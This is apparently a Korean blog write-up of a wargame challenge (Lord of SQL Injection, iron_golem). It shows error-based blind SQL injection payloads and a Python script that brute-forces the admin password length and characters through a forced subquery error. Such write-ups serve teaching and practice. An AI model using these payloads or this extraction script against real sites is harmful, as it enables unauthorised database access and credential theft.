반응형
mysql error가 있으면 error을 내뿜어준다.
Error Base Blind SQL injection 문제이다.
조건문을 이용하여 error을 발생시켜보았다.
항상 참 쿼리
pw=' or id='admin' and if(1=1,1,(select 1 union select 2))%23
항상 거짓 쿼리
pw=' or id='admin' and if(1=2,1,(select 1 union select 2))%23
이것을 이용하여 파이썬 코드를 작성한다.
import requests
cookies= {'PHPSESSID':'5029udlls5r1m3m52n0crur5rh'}
url = 'https://los.rubiya.kr/chall/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?'
pw = ''
#pw길이 구하기
for i in range(1,99):
payload = "pw=%27%20or%20id=%27admin%27%20and%20if(length(pw)={},1,(select%201%20union%20select%202))%23".format(i)
new_url = url+payload
res = requests.get(new_url, cookies=cookies)
res.raise_for_status()
if "Subquery returns more than 1 row" not in res.text:
length = i
break
print("pw length : " +str(length))
# pw 구하기
for i in range(1,length+1):
for j in range(33,127):
payload = "pw=%27%20or%20if((select%20id=%27admin%27%20and%20ord(substr(pw,{},1))={}),1,(select%201%20union%20select%202))%23".format(i, j)
new_url = url+payload
res = requests.get(new_url, cookies=cookies)
res.raise_for_status()
if "Subquery returns more than 1 row" not in res.text:
pw += chr(j)
print("pw: "+pw)
break
print ("pw : "+pw)pw가 32글자나 되어서 오래걸렸다..
반응형
'Write-Up > LOS (lord of sql injection)' 카테고리의 다른 글
| [Lord of SQL Injection] 23번 hell_fire (0) | 2021.01.23 |
|---|---|
| [Lord of SQL Injection] 22번 dark_eyes (0) | 2021.01.22 |
| [Lord of SQL Injection] 20번 dragon (0) | 2021.01.22 |
| [Lord of SQL Injection] 19번 xavis (0) | 2021.01.22 |
| [Lord of SQL Injection] 18번 nightmare (0) | 2021.01.22 |